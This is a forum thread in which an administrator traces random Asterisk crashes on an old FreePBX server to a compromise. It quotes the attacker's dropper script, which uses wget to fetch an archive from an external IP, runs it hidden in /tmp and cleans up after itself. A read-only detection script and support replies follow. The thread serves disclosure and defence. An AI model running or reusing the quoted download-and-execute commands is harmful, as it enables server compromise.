Asterisk crashing randomly HACKED

Hello All,

I have had a 1.818.210.58-1 server running for a few years without issue, but recently we have had several situations where asterisk just stops.
If we log into the web portal it confirms that asterisk is down.
A quick amportal restart gets it running, but we of course can’t have this random failure.

Looking in the logs, the most I can find is:

[2016-08-31 20:46:58] DEBUG[18814] taskprocessor.c: destroying taskprocessor ‘core_event_dispatcher’
[2016-08-31 20:46:58] DEBUG[18814] taskprocessor.c: destroying taskprocessor ‘core_event_dispatcher’
[2016-08-31 20:46:58] VERBOSE[18814] asterisk.c: Asterisk cleanly ending (0).
[2016-08-31 20:46:58] VERBOSE[18814] asterisk.c: Asterisk cleanly ending (0).

But nothing helping me find a potential cause.

One other note: a month back the RAID array reported a problem with one of the drives, which ended up being that 1 of the partitions wasn’t syncing. We simply reconfigured the partition to be included in the RAID and it has worked perfectly without errors.

Any suggestions appreciated!

Hello All,

After some digging in the actual apache error log, I found the problem.
runsipb HACK

To share with everyone: they are downloading a tar file to tmp and somehow extracting, then executing it.
This is what it does:
yum install php php5 -y
apt-get install php php5 -y
killall php
killall php
killall php
rm -rf /tmp/pkgsipb*
rm -rf /tmp/pkgsipb.tar
rm -rf /tmp/pkgsipb/
wget -O /tmp/pkgsipb.tar 194.63.142.183/pkgsipb.tar
chmod a+rwx /tmp/pkgsipb.tar
chmod ug+x /tmp/pkgsipb.tar
tar -xvf /tmp/pkgsipb.tar -C /tmp/
cd /tmp/pkgsipb
chmod a+rwx /tmp/pkgsipb/run
chmod ug+x /tmp/pkgsipb/run
chmod a+rwx /tmp/pkgsipb/
chmod ug+x /tmp/pkgsipb/
chmod a+rwx /tmp/pkgsipb/client.php
chmod ug+x /tmp/pkgsipb/client.php
/tmp/pkgsipb/./run 1>>/dev/null 2>>/dev/null &
disown
rm -rf /tmp/runsip
rm -rf /tmp/pkgsipb.tar

@tonyclewis or @tm1000

If you guys would like access to the server to learn more about this attack, you are welcome to contact me.
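For anyone checking their own box for the same thing, below is a small read-only indicator check. It is an added example and not part of this thread or of FreePBX; the paths, the download host and the archive name are taken straight from the script posted above, and the Apache error log location used by the --scan mode (/var/log/httpd/error_log) is an assumption. The --demo mode runs the checks against constructed sample data so it can be tried without a compromised host.

```shell
#!/bin/sh
# Added example (not from the thread): report-only check for the /tmp/pkgsipb
# dropper. Nothing here deletes or kills anything; it only prints what it finds.

# Indicators copied from the script posted in the thread.
IOC_PATHS="/tmp/pkgsipb /tmp/pkgsipb.tar /tmp/runsip"
IOC_HOST="194.63.142.183"
IOC_NAME="pkgsipb"

# check_paths ROOT: look for the dropper's files under ROOT ("" means /).
# Prints each hit; returns 0 if anything was found, 1 otherwise.
check_paths() {
    root="${1:-}"
    found=1
    for p in $IOC_PATHS; do
        if [ -e "$root$p" ]; then
            echo "IOC path present: $root$p"
            found=0
        fi
    done
    return $found
}

# check_log FILE: count lines mentioning the download host or archive name
# (the OP found the command string in the Apache error log). Returns 0 on hits.
check_log() {
    logfile="$1"
    hits=$(grep -c -E "$IOC_HOST|$IOC_NAME" "$logfile" 2>/dev/null || true)
    [ "${hits:-0}" -gt 0 ] && echo "$hits suspicious line(s) in $logfile"
    [ "${hits:-0}" -gt 0 ]
}

# check_procs FILE: FILE holds a process listing (e.g. `ps -eo args` output).
# Returns 0 if the dropper's "run" binary or client.php is in it.
check_procs() {
    grep -q -E '/tmp/pkgsipb/(\./)?run|/tmp/pkgsipb/client\.php' "$1"
}

# Run all three checks against constructed sample data (not real evidence).
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/tmp/pkgsipb"
    : > "$tmp/tmp/pkgsipb/client.php"
    # Constructed Apache error_log lines; client IP is from the documentation range.
    printf '%s\n' \
      '[Wed Aug 31 20:46:10 2016] [error] [client 203.0.113.7] sh: wget -O /tmp/pkgsipb.tar 194.63.142.183/pkgsipb.tar' \
      '[Wed Aug 31 20:47:00 2016] [notice] caught SIGTERM, shutting down' > "$tmp/error_log"
    # Constructed process listing.
    printf '%s\n' '/usr/sbin/asterisk -f' '/tmp/pkgsipb/./run' > "$tmp/ps.txt"
    check_paths "$tmp"
    check_log "$tmp/error_log"
    check_procs "$tmp/ps.txt" && echo "dropper process present in listing"
    rm -rf "$tmp"
}

# Live scan of this host (assumed CentOS-style Apache log path).
scan() {
    check_paths "" || echo "no IOC paths found"
    check_log /var/log/httpd/error_log || echo "no IOC strings in error_log"
    pslist=$(mktemp)
    ps -eo args > "$pslist" 2>/dev/null
    check_procs "$pslist" && echo "dropper process is running" || echo "no dropper process"
    rm -f "$pslist"
}

case "${1:-}" in
    --demo) demo ;;
    --scan) scan ;;
esac
```

Usage: `sh check_pkgsipb.sh --demo` to see the checks fire on the sample data, `sh check_pkgsipb.sh --scan` as root on a suspect box. If the scan reports the process, grab a copy of /tmp/pkgsipb for analysis before touching it, and remember the dropper also killed php and re-installed it, so a clean reinstall is the safe path on a release this old.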

Sorry, but that is an unsupported release, a 3-version-old FreePBX, and using CentOS 5, which had plenty of security issues. There have not been releases for that in 4 years by us now.

No problem, I didn’t know if this was an older attack or maybe one being used today that would be worth seeing what’s there.

Thanks!

The issue is you are on FreePBX 2.10 so it would be useless as that is so old.